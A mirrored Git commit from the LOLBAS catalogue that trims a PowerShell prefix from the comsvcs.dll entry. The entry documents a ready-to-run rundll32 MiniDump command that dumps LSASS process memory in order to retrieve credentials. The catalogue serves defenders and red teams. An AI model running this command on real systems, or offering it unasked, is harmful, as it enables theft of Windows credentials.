public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-28 15:58:24 +01:00
Code Issues Projects Releases Wiki Activity

Remove redundant powershell command from comsvcs entry

Browse Source
This commit is contained in:
Wietze 2022-05-05 11:16:19 +01:00
parent b92ee99627
commit 2b20998371
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSLibraries/comsvcs.yml
View File

@ -4,7 +4,7 @@ Description: COM+ Services
Author:
Created: 2019-08-30
Commands:
- Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump